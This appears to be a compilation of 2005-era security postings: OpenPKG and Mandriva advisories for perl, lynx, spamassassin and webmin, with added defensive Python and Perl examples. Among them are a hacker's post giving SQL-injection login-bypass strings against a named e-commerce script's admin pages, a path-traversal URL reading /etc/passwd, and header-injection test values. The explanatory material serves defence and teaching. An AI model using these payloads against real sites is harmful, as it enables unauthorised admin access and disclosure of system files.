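        "/index.php%0d%0aSet-Cookie:%20x=1",    # header injection attempt
        "//evil.example/",                      # scheme-relative off-site redirect
        "javascript:alert(1)",
    ]:
        print("%-55s %s" % (value, "accepted" if is_safe_return_target(value, HOST) else "rejected"))
```

Checking control characters before urlsplit matters: recent Python versions strip tab, CR and LF from a URL before parsing it, so a check done on the parsed pieces would miss exactly the characters this advisory is about.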
Alisveristr E-Commerce Admin Login SQL Injection
###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###---
###Alisveristr E-commerce User Login Sql Injection
###Alisveristr E-commerce Admin Login Sql Injection
###---
###Site: http://www.alisveristr.com or
###http://www.alisveris-tr.com
###
###Description: An E-Commerce script, it is too
###cool... :)

User login SQL Injection:

Code 1 For User Login:
Username : ' or ''='
Password : ' or ''='

Another User Login SQL Injection:
Username : ' or 'a'='a
Password : ' or 'a'='a

--

Now Admin login SQL injection

ex:
http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim

Code 1 For Admin Login:
Username : ' or ''='
Password : ' or ''='

Code 2 For Admin Login:
Username : ' or 'a'='a
Password : ' or 'a'='a

That's it.

Contact : [EMAIL PROTECTED]
Kurdish Hacker
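The Zen-Cart password_forgotten.php query earlier on this page and the `' or ''='` login strings in this post exploit the same construction: the request value is spliced into the SQL text, so a quote in the value ends the string literal and the rest becomes SQL. The script below is an added example, not code from either post or product; it puts that concatenated form next to a bound-parameter query so the difference can be checked directly. The table, the account row, the credential value and the use of sqlite3 are constructed stand-ins, not either product's real schema, and the MySQL `INTO OUTFILE` payload from the Zen-Cart post is not reproduced (sqlite has no such clause); the login-bypass strings behave the same on any SQL engine.

```python
import sqlite3


def make_demo_db():
    """In-memory stand-in for the admin table the Zen-Cart query reads.
    The single row and its values are placeholders for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, "
                 "admin_email TEXT, admin_pass TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'admin@example.test', "
                 "'credential-placeholder')")
    conn.commit()
    return conn


def find_admin_concatenated(conn, admin_email):
    """Same shape as the password_forgotten.php query: the value is glued into the SQL."""
    sql = ("select admin_id, admin_name, admin_email, admin_pass from admin "
           "where admin_email = '" + admin_email + "'")
    return conn.execute(sql).fetchall()


def find_admin_parameterised(conn, admin_email):
    """Bound parameter: the driver passes the value separately from the SQL text,
    so a quote character inside it can never terminate the string literal."""
    sql = ("select admin_id, admin_name, admin_email, admin_pass from admin "
           "where admin_email = ?")
    return conn.execute(sql, (admin_email,)).fetchall()


def login_concatenated(conn, username, password):
    """Login check built by concatenation, the pattern the ' or ''=' strings defeat:
    the WHERE clause becomes  name = '' or ''='' and pass = '' or ''=''  which is true."""
    sql = ("select admin_name from admin where admin_name = '" + username +
           "' and admin_pass = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, username, password):
    """Same check with bound parameters: both values are compared as plain strings."""
    sql = "select admin_name from admin where admin_name = ? and admin_pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_demo_db()
    for bypass in ("' or ''='", "' or 'a'='a"):
        print("input %-14r concatenated lookup rows: %d  parameterised lookup rows: %d"
              % (bypass, len(find_admin_concatenated(db, bypass)),
                 len(find_admin_parameterised(db, bypass))))
        print("%-22s concatenated login: %s  parameterised login: %s"
              % ("", login_concatenated(db, bypass, bypass),
                 login_parameterised(db, bypass, bypass)))
```

Escaping the quote (zen_db_prepare_input, magic_quotes_gpc) only narrows which characters the attacker can use; the parameterised form removes the problem because the value never becomes part of the SQL text at all.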
[OpenPKG-SA-2005.025] OpenPKG Security Advisory (perl)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                  http://www.openpkg.org
[EMAIL PROTECTED]                                     [EMAIL PROTECTED]
OpenPKG-SA-2005.025                                          03-Dec-2005

Package:             perl
Vulnerability:       integer overflow, arbitrary code execution
OpenPKG Specific:    no

Affected Releases:   Affected Packages:          Corrected Packages:
OpenPKG CURRENT      <= perl-5.8.7-20050921      >= perl-5.8.7-20051203
OpenPKG 2.5          <= perl-5.8.7-2.5.0         >= perl-5.8.7-2.5.1
OpenPKG 2.4          <= perl-5.8.7-2.4.0         >= perl-5.8.7-2.4.1
OpenPKG 2.3          <= perl-5.8.6-2.3.0         >= perl-5.8.6-2.3.1

Description:
  According to a security advisory from Dyad Security [0], an integer overflow bug exists in the Perl [1] programming language. The integer overflow is in the format string functionality (Perl_sv_vcatpvfn) of Perl and allows attackers to overwrite arbitrary memory and possibly execute arbitrary code via format string specifiers with large values. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3962 [2] to the problem.

References:
  [0] http://www.dyadsecurity.com/perl-0002.html
  [1] http://www.perl.org/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3962

For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory.

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFDkZxrgHWT4GPEy58RAikXAKCUQaaaYqxG3+QTRQtNVL5YLXvaMgCdGZqn
MTL3qjtRNoCw7vT6iRUDRs8=
=jRTP
-----END PGP SIGNATURE-----
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
Site: http://www.phpbbstyles.com/

1. Remote File Content Disclosure
http://forum/admin/xs_edit.php?edit=../../../../etc/passwd

2. Full Path Disclosure
http://forum/admin/xs_edit.php?edit=&viewbackup=1

http://wtf.bz/
Re: Re: Microsoft Windows CreateRemoteThread Exploit
You are a bit wrong, q7x: some firewalls and security programs will stop you from calling that function (and some others like that), for example the Tiny Personal Firewall.
MDKSA-2005:221 - Updated spamassassin packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDKSA-2005:221
http://www.mandriva.com/security/
___

Package : spamassassin
Date: December 2, 2005
Affected: 10.1, 10.2, 2006.0
___

Problem Description:

SpamAssassin 3.0.4 allows attackers to bypass spam detection via an e-mail with a large number of recipients ("To" addresses), which triggers a bus error in Perl.

Updated packages have been patched to address this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351
___

Updated Packages:

Mandriva Linux 10.1:
bef6bc710a84e631fdd4d4f94a86248c 10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.i586.rpm
6c3246d2e9860379b267593fbdd2be74 10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.i586.rpm
75171a7044be3d193e2f9979fd991e62 10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.i586.rpm
20f74aae0c01c0819fc0d686a2967979 10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.i586.rpm
095c5d7c16b74e4004bf731c427c9b0f 10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.i586.rpm
c605bdcc9ac46522efaeca7e12c80949 10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm

Mandriva Linux 10.1/X86_64:
18805a860661de486a7ae0a716823da2 x86_64/10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.x86_64.rpm
3fd255f3e04fc2b4380063a9b4ca7403 x86_64/10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.x86_64.rpm
208127aaeb59bb39b9711b4e260fd47c x86_64/10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.x86_64.rpm
21c05e1003d08a3a9b869971d713c6a7 x86_64/10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.x86_64.rpm
086b1cb83ee2f4343116bbece2b37261 x86_64/10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.x86_64.rpm
c605bdcc9ac46522efaeca7e12c80949 x86_64/10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm

Mandriva Linux 10.2:
cc43a9f882ef5a1e20d587d961db8d1a 10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.i586.rpm
a42113eae2989be9d3af932338535c5d 10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.i586.rpm
f294a8ebb83ec6245ee4cb477f01510a 10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.i586.rpm
d017ebbbe4778c147dcc9903473aa092 10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.i586.rpm
bb699d1b5875a53b5daace54ef544d20 10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.i586.rpm
eec76ea982c797aaa1b18f6b1c35471c 10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm

Mandriva Linux 10.2/X86_64:
dccacca323368a74af5af12392e1486c x86_64/10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.x86_64.rpm
d104a1c344b1616a881e29e8b4cb495c x86_64/10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.x86_64.rpm
410ce462bf261c2e1c73cff6eefa4517 x86_64/10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.x86_64.rpm
b8c5daaf23e58bcf8d344178a6d28b72 x86_64/10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.x86_64.rpm
04bf196106dfc274c726e9be8bf293ce x86_64/10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.x86_64.rpm
eec76ea982c797aaa1b18f6b1c35471c x86_64/10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm

Mandriva Linux 2006.0:
a4f918d6bf1ca8fedc56537d17a63269 2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.i586.rpm
51c25677480258fb2d314bafb0f9dfa8 2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.i586.rpm
b30bf3189682f28947ede6cc32c23cfe 2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.i586.rpm
af129cafa8c0afacf47848248e2a093f 2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.i586.rpm
e5c6baedbbb98c975cfdbcfbddf50940 2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.i586.rpm
4b6ae867e1bcfc10a29fc13b04d9a1a6 2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
d76d8b497ef31d06b89a3ff3a6c1fbd9 x86_64/2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.x86_64.rpm
29b0e1af99bc43c46c3d53b4c9e1ca1d x86_64/2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.x86_64.rpm
f8239556e3a60e290a51d70ccdc3fc48 x86_64/2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.x86_64.rpm
0f2ac7444f0878e2c6d001d8c52a6bfd x86_64/2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.x86_64.rpm
d6770761031d62efcd536f0d087a0f40 x86_64/2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.x86_64.rpm
4b6ae867e1bcfc10a29fc13b04d9a1a6 x86_64/2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories
[OpenPKG-SA-2005.026] OpenPKG Security Advisory (lynx)
________________________________________________________________________________

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                http://www.openpkg.org
[EMAIL PROTECTED]                                    [EMAIL PROTECTED]
OpenPKG-SA-2005.026                                          03-Dec-2005
________________________________________________________________________________

Package:             lynx
Vulnerability:       command injection
OpenPKG Specific:    no

Affected Releases    Affected Packages          Corrected Packages
OpenPKG CURRENT      <= lynx-2.8.5-20051030     >= lynx-2.8.5.5-20051203
OpenPKG 2.5          <= lynx-2.8.5-2.5.0        >= lynx-2.8.5-2.5.1
OpenPKG 2.4          <= lynx-2.8.5-2.4.0        >= lynx-2.8.5-2.4.1
OpenPKG 2.3          <= lynx-2.8.5-2.3.0        >= lynx-2.8.5-2.3.1

Description:
  According to an iDEFENSE security advisory [0], a command injection
  vulnerability exists in the Lynx [2] WWW textual client. The
  vulnerability could allow attackers to execute arbitrary commands with
  the privileges of the underlying user. The problem specifically exists
  within the feature to execute local "cgi-bin" programs via the
  "lynxcgi:" URI handler. The Common Vulnerabilities and Exposures (CVE)
  project assigned the id CVE-2005-2929 [3] to the problem.

  Additionally, according to a security advisory from Ulf Harnhammar [1],
  a stack-based buffer overflow in the "HTrjis" function in Lynx allows
  remote NNTP servers to execute arbitrary code via certain article
  headers containing Asian characters that cause Lynx to add extra escape
  (ESC) characters. The Common Vulnerabilities and Exposures (CVE) project
  assigned the id CVE-2005-3120 [4] to the problem.

References:
  [0] http://www.idefense.com/application/poi/display?id=338
  [1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
  [2] http://lynx.isc.org/
  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2929
  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120
________________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.
MDKSA-2005:223 - Updated webmin package fixes format string vulnerability
 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2005:223
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : webmin
 Date    : December 2, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 Jack Louis discovered a format string vulnerability in the miniserv.pl
 Perl web server in Webmin before 1.250 and Usermin before 1.180, when
 syslog logging is enabled. This can allow remote attackers to cause a
 denial of service (crash or memory consumption) and possibly execute
 arbitrary code via format string specifiers in the username parameter
 to the login form, which is ultimately used in a syslog call.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3912
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
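To make the Problem Description of MDKSA-2005:223 concrete, here is an added Perl illustration (not Webmin's miniserv.pl code; the subroutine names, usernames and host are constructed) of the bug class: a login-form parameter interpolated into the format argument of a sprintf-style logger such as Sys::Syslog::syslog(), shown next to the fixed form that passes user data only as an argument.

```perl
#!/usr/bin/perl
# Added illustration of a format string bug in a Perl logging path.
# This is NOT Webmin's miniserv.pl; subroutines and values are constructed.
use strict;
use warnings;

# Sys::Syslog::syslog($priority, $format, @args) runs $format through
# sprintf(), so anything attacker-controlled inside $format is parsed as
# a conversion.  That sprintf() step is reproduced directly here so the
# example runs without a syslog daemon.

my $host = '192.0.2.10';   # constructed client address (RFC 5737 range)

# VULNERABLE: the username is interpolated into the format string itself.
# Equivalent to:  syslog('crit', "Failed login as $user from $host");
sub log_line_unsafe {
    my ($user) = @_;
    no warnings;              # hide 'Missing argument in sprintf' noise
    return sprintf("Failed login as $user from $host");
}

# FIXED: constant format; user data is only ever supplied as an argument,
# so '%' characters in it are logged literally.
# Equivalent to:  syslog('crit', 'Failed login as %s from %s', $user, $host);
sub log_line_safe {
    my ($user) = @_;
    return sprintf('Failed login as %s from %s', $user, $host);
}

# Constructed form inputs: a normal name, specifiers that swallow fields,
# a width specifier that balloons the record (memory consumption), and a
# stray '%' that corrupts the rest of the line ("% f" is a conversion).
my @samples = ('alice', '%s%s%s%s', '%9999s', 'bob%');

for my $user (@samples) {
    my $bad  = log_line_unsafe($user);
    my $good = log_line_safe($user);
    printf "%-10s unsafe -> %5d bytes: %.40s\n", "'$user'", length $bad, $bad;
    printf "%-10s safe   -> %5d bytes: %s\n\n", '', length $good, $good;
}
```

Perl's sprintf does not implement %n, so on its own the unsafe form yields corrupted log records and oversized allocations rather than memory writes; the advisory's "possibly execute arbitrary code" refers to the surrounding Perl and syslog machinery, not to this snippet.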